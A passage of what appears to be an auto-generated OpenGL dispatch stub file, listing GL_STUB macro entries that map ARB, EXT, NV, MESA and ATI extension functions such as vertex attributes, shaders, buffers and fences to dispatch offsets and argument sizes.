GL_STUB(ProgramEnvParameter4dvARB, _gloffset_ProgramEnvParameter4dvARB, ProgramEnvParameter4dvARB@12)
GL_STUB(ProgramEnvParameter4fARB, _gloffset_ProgramEnvParameter4fARB, ProgramEnvParameter4fARB@24)
GL_STUB(ProgramEnvParameter4fvARB, _gloffset_ProgramEnvParameter4fvARB, ProgramEnvParameter4fvARB@12)
GL_STUB(ProgramLocalParameter4dARB, _gloffset_ProgramLocalParameter4dARB, ProgramLocalParameter4dARB@40)
GL_STUB(ProgramLocalParameter4dvARB, _gloffset_ProgramLocalParameter4dvARB, ProgramLocalParameter4dvARB@12)
GL_STUB(ProgramLocalParameter4fARB, _gloffset_ProgramLocalParameter4fARB, ProgramLocalParameter4fARB@24)
GL_STUB(ProgramLocalParameter4fvARB, _gloffset_ProgramLocalParameter4fvARB, ProgramLocalParameter4fvARB@12)
GL_STUB(ProgramStringARB, _gloffset_ProgramStringARB, ProgramStringARB@16)
GL_STUB(VertexAttrib1dARB, _gloffset_VertexAttrib1dARB, VertexAttrib1dARB@12)
GL_STUB(VertexAttrib1dvARB, _gloffset_VertexAttrib1dvARB, VertexAttrib1dvARB@8)
GL_STUB(VertexAttrib1fARB, _gloffset_VertexAttrib1fARB, VertexAttrib1fARB@8)
GL_STUB(VertexAttrib1fvARB, _gloffset_VertexAttrib1fvARB, VertexAttrib1fvARB@8)
GL_STUB(VertexAttrib1sARB, _gloffset_VertexAttrib1sARB, VertexAttrib1sARB@8)
GL_STUB(VertexAttrib1svARB, _gloffset_VertexAttrib1svARB, VertexAttrib1svARB@8)
GL_STUB(VertexAttrib2dARB, _gloffset_VertexAttrib2dARB, VertexAttrib2dARB@20)
GL_STUB(VertexAttrib2dvARB, _gloffset_VertexAttrib2dvARB, VertexAttrib2dvARB@8)
GL_STUB(VertexAttrib2fARB, _gloffset_VertexAttrib2fARB, VertexAttrib2fARB@12)
GL_STUB(VertexAttrib2fvARB, _gloffset_VertexAttrib2fvARB, VertexAttrib2fvARB@8)
GL_STUB(VertexAttrib2sARB, _gloffset_VertexAttrib2sARB, VertexAttrib2sARB@12)
GL_STUB(VertexAttrib2svARB, _gloffset_VertexAttrib2svARB, VertexAttrib2svARB@8)
GL_STUB(VertexAttrib3dARB, _gloffset_VertexAttrib3dARB, VertexAttrib3dARB@28)
GL_STUB(VertexAttrib3dvARB, _gloffset_VertexAttrib3dvARB, VertexAttrib3dvARB@8)
GL_STUB(VertexAttrib3fARB, _gloffset_VertexAttrib3fARB, VertexAttrib3fARB@16)
GL_STUB(VertexAttrib3fvARB, _gloffset_VertexAttrib3fvARB, VertexAttrib3fvARB@8)
GL_STUB(VertexAttrib3sARB, _gloffset_VertexAttrib3sARB, VertexAttrib3sARB@16)
GL_STUB(VertexAttrib3svARB, _gloffset_VertexAttrib3svARB, VertexAttrib3svARB@8)
GL_STUB(VertexAttrib4NbvARB, _gloffset_VertexAttrib4NbvARB, VertexAttrib4NbvARB@8)
GL_STUB(VertexAttrib4NivARB, _gloffset_VertexAttrib4NivARB, VertexAttrib4NivARB@8)
GL_STUB(VertexAttrib4NsvARB, _gloffset_VertexAttrib4NsvARB, VertexAttrib4NsvARB@8)
GL_STUB(VertexAttrib4NubARB, _gloffset_VertexAttrib4NubARB, VertexAttrib4NubARB@20)
GL_STUB(VertexAttrib4NubvARB, _gloffset_VertexAttrib4NubvARB, VertexAttrib4NubvARB@8)
GL_STUB(VertexAttrib4NuivARB, _gloffset_VertexAttrib4NuivARB, VertexAttrib4NuivARB@8)
GL_STUB(VertexAttrib4NusvARB, _gloffset_VertexAttrib4NusvARB, VertexAttrib4NusvARB@8)
GL_STUB(VertexAttrib4bvARB, _gloffset_VertexAttrib4bvARB, VertexAttrib4bvARB@8)
GL_STUB(VertexAttrib4dARB, _gloffset_VertexAttrib4dARB, VertexAttrib4dARB@36)
GL_STUB(VertexAttrib4dvARB, _gloffset_VertexAttrib4dvARB, VertexAttrib4dvARB@8)
GL_STUB(VertexAttrib4fARB, _gloffset_VertexAttrib4fARB, VertexAttrib4fARB@20)
GL_STUB(VertexAttrib4fvARB, _gloffset_VertexAttrib4fvARB, VertexAttrib4fvARB@8)
GL_STUB(VertexAttrib4ivARB, _gloffset_VertexAttrib4ivARB, VertexAttrib4ivARB@8)
GL_STUB(VertexAttrib4sARB, _gloffset_VertexAttrib4sARB, VertexAttrib4sARB@20)
GL_STUB(VertexAttrib4svARB, _gloffset_VertexAttrib4svARB, VertexAttrib4svARB@8)
GL_STUB(VertexAttrib4ubvARB, _gloffset_VertexAttrib4ubvARB, VertexAttrib4ubvARB@8)
GL_STUB(VertexAttrib4uivARB, _gloffset_VertexAttrib4uivARB, VertexAttrib4uivARB@8)
GL_STUB(VertexAttrib4usvARB, _gloffset_VertexAttrib4usvARB, VertexAttrib4usvARB@8)
GL_STUB(VertexAttribPointerARB, _gloffset_VertexAttribPointerARB, VertexAttribPointerARB@24)
GL_STUB(BindBufferARB, _gloffset_BindBufferARB, BindBufferARB@8)
GL_STUB(BufferDataARB, _gloffset_BufferDataARB, BufferDataARB@16)
GL_STUB(BufferSubDataARB, _gloffset_BufferSubDataARB, BufferSubDataARB@16)
GL_STUB(DeleteBuffersARB, _gloffset_DeleteBuffersARB, DeleteBuffersARB@8)
GL_STUB(GenBuffersARB, _gloffset_GenBuffersARB, GenBuffersARB@8)
GL_STUB(GetBufferParameterivARB, _gloffset_GetBufferParameterivARB, GetBufferParameterivARB@12)
GL_STUB(GetBufferPointervARB, _gloffset_GetBufferPointervARB, GetBufferPointervARB@12)
GL_STUB(GetBufferSubDataARB, _gloffset_GetBufferSubDataARB, GetBufferSubDataARB@16)
GL_STUB(IsBufferARB, _gloffset_IsBufferARB, IsBufferARB@4)
GL_STUB(MapBufferARB, _gloffset_MapBufferARB, MapBufferARB@8)
GL_STUB(UnmapBufferARB, _gloffset_UnmapBufferARB, UnmapBufferARB@4)
GL_STUB(BeginQueryARB, _gloffset_BeginQueryARB, BeginQueryARB@8)
GL_STUB(DeleteQueriesARB, _gloffset_DeleteQueriesARB, DeleteQueriesARB@8)
GL_STUB(EndQueryARB, _gloffset_EndQueryARB, EndQueryARB@4)
GL_STUB(GenQueriesARB, _gloffset_GenQueriesARB, GenQueriesARB@8)
GL_STUB(GetQueryObjectivARB, _gloffset_GetQueryObjectivARB, GetQueryObjectivARB@12)
GL_STUB(GetQueryObjectuivARB, _gloffset_GetQueryObjectuivARB, GetQueryObjectuivARB@12)
GL_STUB(GetQueryivARB, _gloffset_GetQueryivARB, GetQueryivARB@12)
GL_STUB(IsQueryARB, _gloffset_IsQueryARB, IsQueryARB@4)
GL_STUB(AttachObjectARB, _gloffset_AttachObjectARB, AttachObjectARB@8)
GL_STUB(CompileShaderARB, _gloffset_CompileShaderARB, CompileShaderARB@4)
GL_STUB(CreateProgramObjectARB, _gloffset_CreateProgramObjectARB, CreateProgramObjectARB@0)
GL_STUB(CreateShaderObjectARB, _gloffset_CreateShaderObjectARB, CreateShaderObjectARB@4)
GL_STUB(DeleteObjectARB, _gloffset_DeleteObjectARB, DeleteObjectARB@4)
GL_STUB(DetachObjectARB, _gloffset_DetachObjectARB, DetachObjectARB@8)
GL_STUB(GetActiveUniformARB, _gloffset_GetActiveUniformARB, GetActiveUniformARB@28)
GL_STUB(GetAttachedObjectsARB, _gloffset_GetAttachedObjectsARB, GetAttachedObjectsARB@16)
GL_STUB(GetHandleARB, _gloffset_GetHandleARB, GetHandleARB@4)
GL_STUB(GetInfoLogARB, _gloffset_GetInfoLogARB, GetInfoLogARB@16)
GL_STUB(GetObjectParameterfvARB, _gloffset_GetObjectParameterfvARB, GetObjectParameterfvARB@12)
GL_STUB(GetObjectParameterivARB, _gloffset_GetObjectParameterivARB, GetObjectParameterivARB@12)
GL_STUB(GetShaderSourceARB, _gloffset_GetShaderSourceARB, GetShaderSourceARB@16)
GL_STUB(GetUniformLocationARB, _gloffset_GetUniformLocationARB, GetUniformLocationARB@8)
GL_STUB(GetUniformfvARB, _gloffset_GetUniformfvARB, GetUniformfvARB@12)
GL_STUB(GetUniformivARB, _gloffset_GetUniformivARB, GetUniformivARB@12)
GL_STUB(LinkProgramARB, _gloffset_LinkProgramARB, LinkProgramARB@4)
GL_STUB(ShaderSourceARB, _gloffset_ShaderSourceARB, ShaderSourceARB@16)
GL_STUB(Uniform1fARB, _gloffset_Uniform1fARB, Uniform1fARB@8)
GL_STUB(Uniform1fvARB, _gloffset_Uniform1fvARB, Uniform1fvARB@12)
GL_STUB(Uniform1iARB, _gloffset_Uniform1iARB, Uniform1iARB@8)
GL_STUB(Uniform1ivARB, _gloffset_Uniform1ivARB, Uniform1ivARB@12)
GL_STUB(Uniform2fARB, _gloffset_Uniform2fARB, Uniform2fARB@12)
GL_STUB(Uniform2fvARB, _gloffset_Uniform2fvARB, Uniform2fvARB@12)
GL_STUB(Uniform2iARB, _gloffset_Uniform2iARB, Uniform2iARB@12)
GL_STUB(Uniform2ivARB, _gloffset_Uniform2ivARB, Uniform2ivARB@12)
GL_STUB(Uniform3fARB, _gloffset_Uniform3fARB, Uniform3fARB@16)
GL_STUB(Uniform3fvARB, _gloffset_Uniform3fvARB, Uniform3fvARB@12)
GL_STUB(Uniform3iARB, _gloffset_Uniform3iARB, Uniform3iARB@16)
GL_STUB(Uniform3ivARB, _gloffset_Uniform3ivARB, Uniform3ivARB@12)
GL_STUB(Uniform4fARB, _gloffset_Uniform4fARB, Uniform4fARB@20)
GL_STUB(Uniform4fvARB, _gloffset_Uniform4fvARB, Uniform4fvARB@12)
GL_STUB(Uniform4iARB, _gloffset_Uniform4iARB, Uniform4iARB@20)
GL_STUB(Uniform4ivARB, _gloffset_Uniform4ivARB, Uniform4ivARB@12)
GL_STUB(UniformMatrix2fvARB, _gloffset_UniformMatrix2fvARB, UniformMatrix2fvARB@16)
GL_STUB(UniformMatrix3fvARB, _gloffset_UniformMatrix3fvARB, UniformMatrix3fvARB@16)
GL_STUB(UniformMatrix4fvARB, _gloffset_UniformMatrix4fvARB, UniformMatrix4fvARB@16)
GL_STUB(UseProgramObjectARB, _gloffset_UseProgramObjectARB, UseProgramObjectARB@4)
GL_STUB(ValidateProgramARB, _gloffset_ValidateProgramARB, ValidateProgramARB@4)
GL_STUB(BindAttribLocationARB, _gloffset_BindAttribLocationARB, BindAttribLocationARB@12)
GL_STUB(GetActiveAttribARB, _gloffset_GetActiveAttribARB, GetActiveAttribARB@28)
GL_STUB(GetAttribLocationARB, _gloffset_GetAttribLocationARB, GetAttribLocationARB@8)
GL_STUB(DrawBuffersARB, _gloffset_DrawBuffersARB, DrawBuffersARB@8)
GL_STUB(PolygonOffsetEXT, _gloffset_PolygonOffsetEXT, PolygonOffsetEXT@8)
GL_STUB(_dispatch_stub_562, _gloffset_GetPixelTexGenParameterfvSGIS, _dispatch_stub_562@8)
HIDDEN(GL_PREFIX(_dispatch_stub_562, _dispatch_stub_562@8))
GL_STUB(_dispatch_stub_563, _gloffset_GetPixelTexGenParameterivSGIS, _dispatch_stub_563@8)
HIDDEN(GL_PREFIX(_dispatch_stub_563, _dispatch_stub_563@8))
GL_STUB(_dispatch_stub_564, _gloffset_PixelTexGenParameterfSGIS, _dispatch_stub_564@8)
HIDDEN(GL_PREFIX(_dispatch_stub_564, _dispatch_stub_564@8))
GL_STUB(_dispatch_stub_565, _gloffset_PixelTexGenParameterfvSGIS, _dispatch_stub_565@8)
HIDDEN(GL_PREFIX(_dispatch_stub_565, _dispatch_stub_565@8))
GL_STUB(_dispatch_stub_566, _gloffset_PixelTexGenParameteriSGIS, _dispatch_stub_566@8)
HIDDEN(GL_PREFIX(_dispatch_stub_566, _dispatch_stub_566@8))
GL_STUB(_dispatch_stub_567, _gloffset_PixelTexGenParameterivSGIS, _dispatch_stub_567@8)
HIDDEN(GL_PREFIX(_dispatch_stub_567, _dispatch_stub_567@8))
GL_STUB(_dispatch_stub_568, _gloffset_SampleMaskSGIS, _dispatch_stub_568@8)
HIDDEN(GL_PREFIX(_dispatch_stub_568, _dispatch_stub_568@8))
GL_STUB(_dispatch_stub_569, _gloffset_SamplePatternSGIS, _dispatch_stub_569@4)
HIDDEN(GL_PREFIX(_dispatch_stub_569, _dispatch_stub_569@4))
GL_STUB(ColorPointerEXT, _gloffset_ColorPointerEXT, ColorPointerEXT@20)
GL_STUB(EdgeFlagPointerEXT, _gloffset_EdgeFlagPointerEXT, EdgeFlagPointerEXT@12)
GL_STUB(IndexPointerEXT, _gloffset_IndexPointerEXT, IndexPointerEXT@16)
GL_STUB(NormalPointerEXT, _gloffset_NormalPointerEXT, NormalPointerEXT@16)
GL_STUB(TexCoordPointerEXT, _gloffset_TexCoordPointerEXT, TexCoordPointerEXT@20)
GL_STUB(VertexPointerEXT, _gloffset_VertexPointerEXT, VertexPointerEXT@20)
GL_STUB(PointParameterfEXT, _gloffset_PointParameterfEXT, PointParameterfEXT@8)
GL_STUB(PointParameterfvEXT, _gloffset_PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB(LockArraysEXT, _gloffset_LockArraysEXT, LockArraysEXT@8)
GL_STUB(UnlockArraysEXT, _gloffset_UnlockArraysEXT, UnlockArraysEXT@0)
GL_STUB(_dispatch_stub_580, _gloffset_CullParameterdvEXT, _dispatch_stub_580@8)
HIDDEN(GL_PREFIX(_dispatch_stub_580, _dispatch_stub_580@8))
GL_STUB(_dispatch_stub_581, _gloffset_CullParameterfvEXT, _dispatch_stub_581@8)
HIDDEN(GL_PREFIX(_dispatch_stub_581, _dispatch_stub_581@8))
GL_STUB(SecondaryColor3bEXT, _gloffset_SecondaryColor3bEXT, SecondaryColor3bEXT@12)
GL_STUB(SecondaryColor3bvEXT, _gloffset_SecondaryColor3bvEXT, SecondaryColor3bvEXT@4)
GL_STUB(SecondaryColor3dEXT, _gloffset_SecondaryColor3dEXT, SecondaryColor3dEXT@24)
GL_STUB(SecondaryColor3dvEXT, _gloffset_SecondaryColor3dvEXT, SecondaryColor3dvEXT@4)
GL_STUB(SecondaryColor3fEXT, _gloffset_SecondaryColor3fEXT, SecondaryColor3fEXT@12)
GL_STUB(SecondaryColor3fvEXT, _gloffset_SecondaryColor3fvEXT, SecondaryColor3fvEXT@4)
GL_STUB(SecondaryColor3iEXT, _gloffset_SecondaryColor3iEXT, SecondaryColor3iEXT@12)
GL_STUB(SecondaryColor3ivEXT, _gloffset_SecondaryColor3ivEXT, SecondaryColor3ivEXT@4)
GL_STUB(SecondaryColor3sEXT, _gloffset_SecondaryColor3sEXT, SecondaryColor3sEXT@12)
GL_STUB(SecondaryColor3svEXT, _gloffset_SecondaryColor3svEXT, SecondaryColor3svEXT@4)
GL_STUB(SecondaryColor3ubEXT, _gloffset_SecondaryColor3ubEXT, SecondaryColor3ubEXT@12)
GL_STUB(SecondaryColor3ubvEXT, _gloffset_SecondaryColor3ubvEXT, SecondaryColor3ubvEXT@4)
GL_STUB(SecondaryColor3uiEXT, _gloffset_SecondaryColor3uiEXT, SecondaryColor3uiEXT@12)
GL_STUB(SecondaryColor3uivEXT, _gloffset_SecondaryColor3uivEXT, SecondaryColor3uivEXT@4)
GL_STUB(SecondaryColor3usEXT, _gloffset_SecondaryColor3usEXT, SecondaryColor3usEXT@12)
GL_STUB(SecondaryColor3usvEXT, _gloffset_SecondaryColor3usvEXT, SecondaryColor3usvEXT@4)
GL_STUB(SecondaryColorPointerEXT, _gloffset_SecondaryColorPointerEXT, SecondaryColorPointerEXT@16)
GL_STUB(MultiDrawArraysEXT, _gloffset_MultiDrawArraysEXT, MultiDrawArraysEXT@16)
GL_STUB(MultiDrawElementsEXT, _gloffset_MultiDrawElementsEXT, MultiDrawElementsEXT@20)
GL_STUB(FogCoordPointerEXT, _gloffset_FogCoordPointerEXT, FogCoordPointerEXT@12)
GL_STUB(FogCoorddEXT, _gloffset_FogCoorddEXT, FogCoorddEXT@8)
GL_STUB(FogCoorddvEXT, _gloffset_FogCoorddvEXT, FogCoorddvEXT@4)
GL_STUB(FogCoordfEXT, _gloffset_FogCoordfEXT, FogCoordfEXT@4)
GL_STUB(FogCoordfvEXT, _gloffset_FogCoordfvEXT, FogCoordfvEXT@4)
GL_STUB(_dispatch_stub_606, _gloffset_PixelTexGenSGIX, _dispatch_stub_606@4)
HIDDEN(GL_PREFIX(_dispatch_stub_606, _dispatch_stub_606@4))
GL_STUB(BlendFuncSeparateEXT, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB(FlushVertexArrayRangeNV, _gloffset_FlushVertexArrayRangeNV, FlushVertexArrayRangeNV@0)
GL_STUB(VertexArrayRangeNV, _gloffset_VertexArrayRangeNV, VertexArrayRangeNV@8)
GL_STUB(CombinerInputNV, _gloffset_CombinerInputNV, CombinerInputNV@24)
GL_STUB(CombinerOutputNV, _gloffset_CombinerOutputNV, CombinerOutputNV@40)
GL_STUB(CombinerParameterfNV, _gloffset_CombinerParameterfNV, CombinerParameterfNV@8)
GL_STUB(CombinerParameterfvNV, _gloffset_CombinerParameterfvNV, CombinerParameterfvNV@8)
GL_STUB(CombinerParameteriNV, _gloffset_CombinerParameteriNV, CombinerParameteriNV@8)
GL_STUB(CombinerParameterivNV, _gloffset_CombinerParameterivNV, CombinerParameterivNV@8)
GL_STUB(FinalCombinerInputNV, _gloffset_FinalCombinerInputNV, FinalCombinerInputNV@16)
GL_STUB(GetCombinerInputParameterfvNV, _gloffset_GetCombinerInputParameterfvNV, GetCombinerInputParameterfvNV@20)
GL_STUB(GetCombinerInputParameterivNV, _gloffset_GetCombinerInputParameterivNV, GetCombinerInputParameterivNV@20)
GL_STUB(GetCombinerOutputParameterfvNV, _gloffset_GetCombinerOutputParameterfvNV, GetCombinerOutputParameterfvNV@16)
GL_STUB(GetCombinerOutputParameterivNV, _gloffset_GetCombinerOutputParameterivNV, GetCombinerOutputParameterivNV@16)
GL_STUB(GetFinalCombinerInputParameterfvNV, _gloffset_GetFinalCombinerInputParameterfvNV, GetFinalCombinerInputParameterfvNV@12)
GL_STUB(GetFinalCombinerInputParameterivNV, _gloffset_GetFinalCombinerInputParameterivNV, GetFinalCombinerInputParameterivNV@12)
GL_STUB(ResizeBuffersMESA, _gloffset_ResizeBuffersMESA, ResizeBuffersMESA@0)
GL_STUB(WindowPos2dMESA, _gloffset_WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB(WindowPos2dvMESA, _gloffset_WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB(WindowPos2fMESA, _gloffset_WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB(WindowPos2fvMESA, _gloffset_WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB(WindowPos2iMESA, _gloffset_WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB(WindowPos2ivMESA, _gloffset_WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB(WindowPos2sMESA, _gloffset_WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB(WindowPos2svMESA, _gloffset_WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB(WindowPos3dMESA, _gloffset_WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB(WindowPos3dvMESA, _gloffset_WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB(WindowPos3fMESA, _gloffset_WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB(WindowPos3fvMESA, _gloffset_WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB(WindowPos3iMESA, _gloffset_WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB(WindowPos3ivMESA, _gloffset_WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB(WindowPos3sMESA, _gloffset_WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB(WindowPos3svMESA, _gloffset_WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB(WindowPos4dMESA, _gloffset_WindowPos4dMESA, WindowPos4dMESA@32)
GL_STUB(WindowPos4dvMESA, _gloffset_WindowPos4dvMESA, WindowPos4dvMESA@4)
GL_STUB(WindowPos4fMESA, _gloffset_WindowPos4fMESA, WindowPos4fMESA@16)
GL_STUB(WindowPos4fvMESA, _gloffset_WindowPos4fvMESA, WindowPos4fvMESA@4)
GL_STUB(WindowPos4iMESA, _gloffset_WindowPos4iMESA, WindowPos4iMESA@16)
GL_STUB(WindowPos4ivMESA, _gloffset_WindowPos4ivMESA, WindowPos4ivMESA@4)
GL_STUB(WindowPos4sMESA, _gloffset_WindowPos4sMESA, WindowPos4sMESA@16)
GL_STUB(WindowPos4svMESA, _gloffset_WindowPos4svMESA, WindowPos4svMESA@4)
GL_STUB(_dispatch_stub_648, _gloffset_MultiModeDrawArraysIBM, _dispatch_stub_648@20)
HIDDEN(GL_PREFIX(_dispatch_stub_648, _dispatch_stub_648@20))
GL_STUB(_dispatch_stub_649, _gloffset_MultiModeDrawElementsIBM, _dispatch_stub_649@24)
HIDDEN(GL_PREFIX(_dispatch_stub_649, _dispatch_stub_649@24))
GL_STUB(_dispatch_stub_650, _gloffset_DeleteFencesNV, _dispatch_stub_650@8)
HIDDEN(GL_PREFIX(_dispatch_stub_650, _dispatch_stub_650@8))
GL_STUB(_dispatch_stub_651, _gloffset_FinishFenceNV, _dispatch_stub_651@4)
HIDDEN(GL_PREFIX(_dispatch_stub_651, _dispatch_stub_651@4))
GL_STUB(_dispatch_stub_652, _gloffset_GenFencesNV, _dispatch_stub_652@8)
HIDDEN(GL_PREFIX(_dispatch_stub_652, _dispatch_stub_652@8))
GL_STUB(_dispatch_stub_653, _gloffset_GetFenceivNV, _dispatch_stub_653@12)
HIDDEN(GL_PREFIX(_dispatch_stub_653, _dispatch_stub_653@12))
GL_STUB(_dispatch_stub_654, _gloffset_IsFenceNV, _dispatch_stub_654@4)
HIDDEN(GL_PREFIX(_dispatch_stub_654, _dispatch_stub_654@4))
GL_STUB(_dispatch_stub_655, _gloffset_SetFenceNV, _dispatch_stub_655@8)
HIDDEN(GL_PREFIX(_dispatch_stub_655, _dispatch_stub_655@8))
GL_STUB(_dispatch_stub_656, _gloffset_TestFenceNV, _dispatch_stub_656@4)
HIDDEN(GL_PREFIX(_dispatch_stub_656, _dispatch_stub_656@4))
GL_STUB(AreProgramsResidentNV, _gloffset_AreProgramsResidentNV, AreProgramsResidentNV@12)
GL_STUB(BindProgramNV, _gloffset_BindProgramNV, BindProgramNV@8)
GL_STUB(DeleteProgramsNV, _gloffset_DeleteProgramsNV, DeleteProgramsNV@8)
GL_STUB(ExecuteProgramNV, _gloffset_ExecuteProgramNV, ExecuteProgramNV@12)
GL_STUB(GenProgramsNV, _gloffset_GenProgramsNV, GenProgramsNV@8)
GL_STUB(GetProgramParameterdvNV, _gloffset_GetProgramParameterdvNV, GetProgramParameterdvNV@16)
GL_STUB(GetProgramParameterfvNV, _gloffset_GetProgramParameterfvNV, GetProgramParameterfvNV@16)
GL_STUB(GetProgramStringNV, _gloffset_GetProgramStringNV, GetProgramStringNV@12)
GL_STUB(GetProgramivNV, _gloffset_GetProgramivNV, GetProgramivNV@12)
GL_STUB(GetTrackMatrixivNV, _gloffset_GetTrackMatrixivNV, GetTrackMatrixivNV@16)
GL_STUB(GetVertexAttribPointervNV, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB(GetVertexAttribdvNV, _gloffset_GetVertexAttribdvNV, GetVertexAttribdvNV@12)
GL_STUB(GetVertexAttribfvNV, _gloffset_GetVertexAttribfvNV, GetVertexAttribfvNV@12)
GL_STUB(GetVertexAttribivNV, _gloffset_GetVertexAttribivNV, GetVertexAttribivNV@12)
GL_STUB(IsProgramNV, _gloffset_IsProgramNV, IsProgramNV@4)
GL_STUB(LoadProgramNV, _gloffset_LoadProgramNV, LoadProgramNV@16)
GL_STUB(ProgramParameters4dvNV, _gloffset_ProgramParameters4dvNV, ProgramParameters4dvNV@16)
GL_STUB(ProgramParameters4fvNV, _gloffset_ProgramParameters4fvNV, ProgramParameters4fvNV@16)
GL_STUB(RequestResidentProgramsNV, _gloffset_RequestResidentProgramsNV, RequestResidentProgramsNV@8)
GL_STUB(TrackMatrixNV, _gloffset_TrackMatrixNV, TrackMatrixNV@16)
GL_STUB(VertexAttrib1dNV, _gloffset_VertexAttrib1dNV, VertexAttrib1dNV@12)
GL_STUB(VertexAttrib1dvNV, _gloffset_VertexAttrib1dvNV, VertexAttrib1dvNV@8)
GL_STUB(VertexAttrib1fNV, _gloffset_VertexAttrib1fNV, VertexAttrib1fNV@8)
GL_STUB(VertexAttrib1fvNV, _gloffset_VertexAttrib1fvNV, VertexAttrib1fvNV@8)
GL_STUB(VertexAttrib1sNV, _gloffset_VertexAttrib1sNV, VertexAttrib1sNV@8)
GL_STUB(VertexAttrib1svNV, _gloffset_VertexAttrib1svNV, VertexAttrib1svNV@8)
GL_STUB(VertexAttrib2dNV, _gloffset_VertexAttrib2dNV, VertexAttrib2dNV@20)
GL_STUB(VertexAttrib2dvNV, _gloffset_VertexAttrib2dvNV, VertexAttrib2dvNV@8)
GL_STUB(VertexAttrib2fNV, _gloffset_VertexAttrib2fNV, VertexAttrib2fNV@12)
GL_STUB(VertexAttrib2fvNV, _gloffset_VertexAttrib2fvNV, VertexAttrib2fvNV@8)
GL_STUB(VertexAttrib2sNV, _gloffset_VertexAttrib2sNV, VertexAttrib2sNV@12)
GL_STUB(VertexAttrib2svNV, _gloffset_VertexAttrib2svNV, VertexAttrib2svNV@8)
GL_STUB(VertexAttrib3dNV, _gloffset_VertexAttrib3dNV, VertexAttrib3dNV@28)
GL_STUB(VertexAttrib3dvNV, _gloffset_VertexAttrib3dvNV, VertexAttrib3dvNV@8)
GL_STUB(VertexAttrib3fNV, _gloffset_VertexAttrib3fNV, VertexAttrib3fNV@16)
GL_STUB(VertexAttrib3fvNV, _gloffset_VertexAttrib3fvNV, VertexAttrib3fvNV@8)
GL_STUB(VertexAttrib3sNV, _gloffset_VertexAttrib3sNV, VertexAttrib3sNV@16)
GL_STUB(VertexAttrib3svNV, _gloffset_VertexAttrib3svNV, VertexAttrib3svNV@8)
GL_STUB(VertexAttrib4dNV, _gloffset_VertexAttrib4dNV, VertexAttrib4dNV@36)
GL_STUB(VertexAttrib4dvNV, _gloffset_VertexAttrib4dvNV, VertexAttrib4dvNV@8)
GL_STUB(VertexAttrib4fNV, _gloffset_VertexAttrib4fNV, VertexAttrib4fNV@20)
GL_STUB(VertexAttrib4fvNV, _gloffset_VertexAttrib4fvNV, VertexAttrib4fvNV@8)
GL_STUB(VertexAttrib4sNV, _gloffset_VertexAttrib4sNV, VertexAttrib4sNV@20)
GL_STUB(VertexAttrib4svNV, _gloffset_VertexAttrib4svNV, VertexAttrib4svNV@8)
GL_STUB(VertexAttrib4ubNV, _gloffset_VertexAttrib4ubNV, VertexAttrib4ubNV@20)
GL_STUB(VertexAttrib4ubvNV, _gloffset_VertexAttrib4ubvNV, VertexAttrib4ubvNV@8)
GL_STUB(VertexAttribPointerNV, _gloffset_VertexAttribPointerNV, VertexAttribPointerNV@20)
GL_STUB(VertexAttribs1dvNV, _gloffset_VertexAttribs1dvNV, VertexAttribs1dvNV@12)
GL_STUB(VertexAttribs1fvNV, _gloffset_VertexAttribs1fvNV, VertexAttribs1fvNV@12)
GL_STUB(VertexAttribs1svNV, _gloffset_VertexAttribs1svNV, VertexAttribs1svNV@12)
GL_STUB(VertexAttribs2dvNV, _gloffset_VertexAttribs2dvNV, VertexAttribs2dvNV@12)
GL_STUB(VertexAttribs2fvNV, _gloffset_VertexAttribs2fvNV, VertexAttribs2fvNV@12)
GL_STUB(VertexAttribs2svNV, _gloffset_VertexAttribs2svNV, VertexAttribs2svNV@12)
GL_STUB(VertexAttribs3dvNV, _gloffset_VertexAttribs3dvNV, VertexAttribs3dvNV@12)
GL_STUB(VertexAttribs3fvNV, _gloffset_VertexAttribs3fvNV, VertexAttribs3fvNV@12)
GL_STUB(VertexAttribs3svNV, _gloffset_VertexAttribs3svNV, VertexAttribs3svNV@12)
GL_STUB(VertexAttribs4dvNV, _gloffset_VertexAttribs4dvNV, VertexAttribs4dvNV@12)
GL_STUB(VertexAttribs4fvNV, _gloffset_VertexAttribs4fvNV, VertexAttribs4fvNV@12)
GL_STUB(VertexAttribs4svNV, _gloffset_VertexAttribs4svNV, VertexAttribs4svNV@12)
GL_STUB(VertexAttribs4ubvNV, _gloffset_VertexAttribs4ubvNV, VertexAttribs4ubvNV@12)
GL_STUB(AlphaFragmentOp1ATI, _gloffset_AlphaFragmentOp1ATI, AlphaFragmentOp1ATI@24)
GL_STUB(AlphaFragmentOp2ATI, _gloffset_AlphaFragmentOp2ATI, AlphaFragmentOp2ATI@36)
GL_STUB(AlphaFragmentOp3ATI, _gloffset_AlphaFragmentOp3ATI, AlphaFragmentOp3ATI@48)
GL_STUB(BeginFragmentShaderATI, _gloffset_BeginFragmentShaderATI, BeginFragmentShaderATI@0)
GL_STUB(BindFragmentShaderATI, _gloffset_BindFragmentShaderATI, BindFragmentShaderATI@4)
GL_STUB(ColorFragmentOp1ATI, _gloffset_ColorFragmentOp1ATI, ColorFragmentOp1ATI@28)
GL_STUB(ColorFragmentOp2ATI, _gloffset_ColorFragmentOp2ATI, ColorFragmentOp2ATI@40)
GL_STUB(ColorFragmentOp3ATI, _gloffset_ColorFragmentOp3ATI, ColorFragmentOp3ATI@52)
GL_STUB(DeleteFragmentShaderATI, _gloffset_DeleteFragmentShaderATI, DeleteFragmentShaderATI@4)
GL_STUB(EndFragmentShaderATI, _gloffset_EndFragmentShaderATI, EndFragmentShaderATI@0)
GL_STUB(GenFragmentShadersATI, _gloffset_GenFragmentShadersATI, GenFragmentShadersATI@4)
